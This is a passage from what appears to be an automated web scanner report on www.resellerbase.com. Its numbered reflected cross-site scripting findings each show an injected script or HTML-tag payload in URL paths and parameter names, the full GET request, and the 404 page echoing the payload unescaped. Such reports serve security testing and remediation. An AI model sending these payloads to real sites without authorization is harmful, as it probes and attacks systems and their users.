<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/rating.php1322d<script>alert(1)</script>c600f5ea121 was not found on this server.</p>
...[SNIP]...

2.1750. http://www.resellerbase.com/detail/22/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8b60a<script>alert(1)</script>45ad11a6d30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/rating.php?8b60a<script>alert(1)</script>45ad11a6d30=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/rating.php?8b60a<script>alert(1)</script>45ad11a6d30=1 was not found on this server.</p>
...[SNIP]...

2.1751. http://www.resellerbase.com/detail/22/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e7cb5<script>alert(1)</script>044e52dbe258c79e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/22/rating.php/e7cb5<script>alert(1)</script>044e52dbe258c79e8?id=22&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/rating.php/e7cb5<script>alert(1)</script>044e52dbe258c79e8?id=22&rating=5 was not found on this server.</p>
...[SNIP]...

2.1752. http://www.resellerbase.com/detail/22/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac2ad<script>alert(1)</script>6f0498f8347 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailac2ad<script>alert(1)</script>6f0498f8347/22/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailac2ad<script>alert(1)</script>6f0498f8347/22/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1753. http://www.resellerbase.com/detail/22/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b44c2<script>alert(1)</script>8fb3aedc917 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22b44c2<script>alert(1)</script>8fb3aedc917/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22b44c2<script>alert(1)</script>8fb3aedc917/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1754. http://www.resellerbase.com/detail/22/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 28c72<script>alert(1)</script>17d5d67f779 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/search.php28c72<script>alert(1)</script>17d5d67f779?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/search.php28c72<script>alert(1)</script>17d5d67f779?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1755. http://www.resellerbase.com/detail/22/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/22/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d3f6b<a>1e23333acb8 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/search.php?keyword=search...&Submit3=Searchd3f6b<a>1e23333acb8&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/search.php?keyword=search...&Submit3=Searchd3f6b<a>1e23333acb8&opt=2 was not found on this server.</p>
...[SNIP]...

2.1756. http://www.resellerbase.com/detail/22/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/22/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 1bd63<a>50f33bcf534 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/search.php?keyword=search...1bd63<a>50f33bcf534&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/search.php?keyword=search...1bd63<a>50f33bcf534&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1757. http://www.resellerbase.com/detail/22/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b62b0<script>alert(1)</script>6734ec93b84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/search.php?keyword=search...&Submit3=Search&opt=2&b62b0<script>alert(1)</script>6734ec93b84=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/search.php?keyword=search...&Submit3=Search&opt=2&b62b0<script>alert(1)</script>6734ec93b84=1 was not found on this server.</p>
...[SNIP]...

2.1758. http://www.resellerbase.com/detail/22/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/22/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 65ff8<a>25c62172825 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/22/search.php?keyword=search...&Submit3=Search&opt=265ff8<a>25c62172825 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/search.php?keyword=search...&Submit3=Search&opt=265ff8<a>25c62172825 was not found on this server.</p>
...[SNIP]...

2.1759. http://www.resellerbase.com/detail/22/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 50c45<script>alert(1)</script>65d9046e113 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail50c45<script>alert(1)</script>65d9046e113/22/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail50c45<script>alert(1)</script>65d9046e113/22/themes/ was not found on this server.</p>
...[SNIP]...

2.1760. http://www.resellerbase.com/detail/22/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c3234<script>alert(1)</script>43d4ffec630 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22c3234<script>alert(1)</script>43d4ffec630/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22c3234<script>alert(1)</script>43d4ffec630/themes/ was not found on this server.</p>
...[SNIP]...

2.1761. http://www.resellerbase.com/detail/22/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f70f6<script>alert(1)</script>2ea0235048e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themesf70f6<script>alert(1)</script>2ea0235048e/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themesf70f6<script>alert(1)</script>2ea0235048e/ was not found on this server.</p>
...[SNIP]...

2.1762. http://www.resellerbase.com/detail/22/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4105a<script>alert(1)</script>59aeb9ae75c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/?4105a<script>alert(1)</script>59aeb9ae75c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/?4105a<script>alert(1)</script>59aeb9ae75c=1 was not found on this server.</p>
...[SNIP]...

2.1763. http://www.resellerbase.com/detail/22/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 94f74<script>alert(1)</script>80b46527f25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail94f74<script>alert(1)</script>80b46527f25/22/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail94f74<script>alert(1)</script>80b46527f25/22/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1764. http://www.resellerbase.com/detail/22/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2e229<script>alert(1)</script>dadd5df61ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/222e229<script>alert(1)</script>dadd5df61ae/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.1765. http://www.resellerbase.com/detail/22/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bbbb0<script>alert(1)</script>ac4fe44e139 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themesbbbb0<script>alert(1)</script>ac4fe44e139/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.1766. http://www.resellerbase.com/detail/22/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f4903<script>alert(1)</script>8eed7d51208 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmosf4903<script>alert(1)</script>8eed7d51208/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmosf4903<script>alert(1)</script>8eed7d51208/ was not found on this server.</p>
...[SNIP]...

2.1767. http://www.resellerbase.com/detail/22/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1e292<script>alert(1)</script>87762eb3c67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themes/kosmos/?1e292<script>alert(1)</script>87762eb3c67=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/22/themes/kosmos/?1e292<script>alert(1)</script>87762eb3c67=1 was not found on this server.</p>
...[SNIP]...

2.1768. http://www.resellerbase.com/detail/22/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3d7e4<script>alert(1)</script>7a5adfc1de3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3d7e4<script>alert(1)</script>7a5adfc1de3/22/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3d7e4<script>alert(1)</script>7a5adfc1de3/22/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1769. http://www.resellerbase.com/detail/22/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25b94<script>alert(1)</script>668f6093ba0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2225b94<script>alert(1)</script>668f6093ba0/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2225b94<script>alert(1)</script>668f6093ba0/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1770. http://www.resellerbase.com/detail/22/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/22/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b2356<script>alert(1)</script>252c7fac28c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/22/themesb2356<script>alert(1)</script>252c7fac28c/kosmos/images/ HTTP/1.1
